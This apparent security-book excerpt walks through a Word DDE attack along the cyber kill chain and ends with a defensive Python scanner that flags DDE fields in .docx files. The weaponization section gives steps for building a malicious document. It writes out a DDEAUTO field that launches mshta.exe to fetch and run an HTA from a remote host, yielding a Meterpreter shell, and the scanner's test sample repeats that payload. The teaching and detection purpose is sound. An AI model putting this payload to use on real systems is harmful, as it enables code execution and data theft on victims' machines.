In recent attacks, adversaries have executed arbitrary code from a Microsoft Word document without using any macros or scripts. The technique abuses a legitimate Microsoft Office feature called Dynamic Data Exchange (DDE), a legacy inter-process messaging mechanism that lets a document ask Windows to start another application and exchange data with it.
Let's look at this attack from a cyber kill chain perspective. The cyber kill chain describes an attack as a sequence of stages:
- Reconnaissance: This is the planning phase, in which the attacker gathers information about the target through observation and other collection methods. Cyber attack planning and reconnaissance usually involve researching the target with open source intelligence tools, such as Google and Shodan, and searching publicly available data, such as public announcements, social media, company profiles and email address formats, and harvesting email addresses.
- Weaponization: In this stage, the threat actor chooses the attack method, for example phishing an employee or staging a drive-by download. In our example, we first create the malicious document. In a blank Word document, go to Insert | Quick Parts | Field..., as shown in the following screenshot:
In the Field names list of the dialog box, select =(Formula); this inserts a field that we will repurpose to carry our DDE code:
You will now see a field in the document showing the error !Unexpected End of Formula. Right-click the field and choose Toggle Field Codes so that the field's code becomes editable. This is where we craft the DDE payload, which Word will execute when the document is opened and the user allows it, starting the malware or any other code of our choice:
In the field code, replace the existing contents with the following. The \..\..\..\.. sequence after MSword.exe is a path traversal: the bogus Office path in front of it does not need to exist, because it is collapsed during path normalisation, so what actually launches is mshta.exe, which fetches and runs the HTA served at the listed URL:
DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe "http://192.168.1.101:8080/8b0HTF3MdgqYqgK"
Then, save the document with any name of your choice, such as Financial_Statement:
- Delivery: The weaponized document has to reach an endpoint. Common delivery routes are a drive-by download from a website, a targeted phishing email, or an infected employee-owned device that connects to the network over a virtual private network (VPN).
- Exploitation and installation: At this stage, the attacker takes advantage of a software or human weakness to get the payload to run. In DDE exploitation, adversaries email the malicious document to the victim. When the user opens the document and accepts Word's prompts, the DDE field runs and the adversaries receive a reverse shell from the victim's machine.
Let's see how the adversaries built the exploit during the weaponization stage and how they gained access to the victim's machine. They created the malicious document and sent it to the victim by email, as shown in the following screenshot:
When the user opened the document, the payload executed after Word displayed a warning prompt, as shown in the following screenshot:
If the user clicks through the prompt and allows the application to start, the payload executes and a Meterpreter session opens on the attacker's handler:
- Action on objectives: At this stage the threat actor has the access they were after and works towards the goal, here the organization's sensitive files. The adversary attempts to exfiltrate data from the victim's machine; there are many confidential files here that the adversaries try to exfiltrate:
The adversaries also take a screenshot of what the victim is doing and enumerate the processes running on the machine, as shown in the following screenshot:
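The DDEAUTO field crafted in the weaponization stage does not disappear when the document is saved: it is stored as a field instruction inside the .docx XML, which gives defenders a reliable place to look for it. The following scanner is an added example written for this page (it is not the book's code, nor Metasploit's) and uses only the Python standard library. It unpacks a .docx, collects every field instruction from the WordprocessingML parts under word/, joins instructions that Word splits across several w:instrText runs, and flags any that start with DDE or DDEAUTO, matching case-insensitively because Word resolves field names that way. The two documents it scans are constructed inside the script: one carries the same mshta.exe field code shown above (the IP address and URL path are the page's values), the other only a harmless DATE field.

```python
"""Scan a .docx for DDE / DDEAUTO field codes. Added example, stdlib only."""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# Word resolves field names case-insensitively, so "dDeAUTO" launches just as
# "DDEAUTO" does; the leading \s* absorbs the space Word keeps in instrText.
DDE_RE = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)


def field_instructions(xml_bytes):
    """Return every field instruction string found in one WordprocessingML part.

    Covers both forms Word writes: <w:fldSimple w:instr="..."/> and the
    complex form, where the instruction is spread over one or more
    <w:instrText> runs between a fldChar "begin" and "separate"/"end".
    A plain substring search for DDEAUTO misses the split form.
    """
    root = ET.fromstring(xml_bytes)
    found = []
    stack = []  # one [text_parts, seen_separator] entry per open field; fields nest
    for el in root.iter():
        if el.tag == W + "fldSimple":
            found.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([[], False])
            elif kind == "separate" and stack:
                stack[-1][1] = True  # cached result text follows; stop collecting
            elif kind == "end" and stack:
                parts, _ = stack.pop()
                found.append("".join(parts))
        elif el.tag == W + "instrText" and stack and not stack[-1][1]:
            stack[-1][0].append(el.text or "")
    return found


def find_dde_fields(docx_bytes):
    """Return [(part_name, normalised_instruction)] for each DDE field in a .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            # body, headers, footers, footnotes, ... all live under word/
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                instructions = field_instructions(z.read(name))
            except ET.ParseError:
                continue
            for instr in instructions:
                if DDE_RE.match(instr):
                    hits.append((name, " ".join(instr.split())))
    return hits


# --- constructed samples (written for this example, not captured in the wild) ---

# The DDEAUTO field from the weaponization step, stored the way Word stores a
# toggled field code: split across two instrText runs, here also in mixed case.
DDE_DOCUMENT_XML = r"""<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
 <w:body><w:p>
  <w:r><w:fldChar w:fldCharType="begin"/></w:r>
  <w:r><w:instrText xml:space="preserve"> dDe</w:instrText></w:r>
  <w:r><w:instrText xml:space="preserve">AUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe "http://192.168.1.101:8080/8b0HTF3MdgqYqgK" </w:instrText></w:r>
  <w:r><w:fldChar w:fldCharType="separate"/></w:r>
  <w:r><w:t>!Unexpected End of Formula</w:t></w:r>
  <w:r><w:fldChar w:fldCharType="end"/></w:r>
 </w:p></w:body>
</w:document>"""

# A harmless document: plain text plus a DATE field in the simple form.
BENIGN_DOCUMENT_XML = r"""<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
 <w:body><w:p>
  <w:r><w:t>Financial statement, Q3</w:t></w:r>
  <w:fldSimple w:instr=" DATE \@ &quot;d MMMM yyyy&quot; "><w:r><w:t>3 October 2017</w:t></w:r></w:fldSimple>
 </w:p></w:body>
</w:document>"""


def make_docx(document_xml):
    """Wrap a document.xml body in a zip. A real .docx carries more parts
    ([Content_Types].xml, rels, styles); the scanner only needs word/*.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def scan_samples():
    """Scan both constructed documents; returns {label: hits}."""
    return {
        "dde": find_dde_fields(make_docx(DDE_DOCUMENT_XML)),
        "benign": find_dde_fields(make_docx(BENIGN_DOCUMENT_XML)),
    }


if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(label, "->", hits if hits else "no DDE fields")
```

Run it as a script to see both verdicts, or import find_dde_fields() and pass it the bytes of any .docx pulled from a mail gateway or a suspicious attachment. A clean result is not proof of absence: the scanner does not evaluate fields whose name is assembled at render time by a nested QUOTE field, so it should sit alongside endpoint controls that alert on Word spawning children such as mshta.exe or cmd.exe.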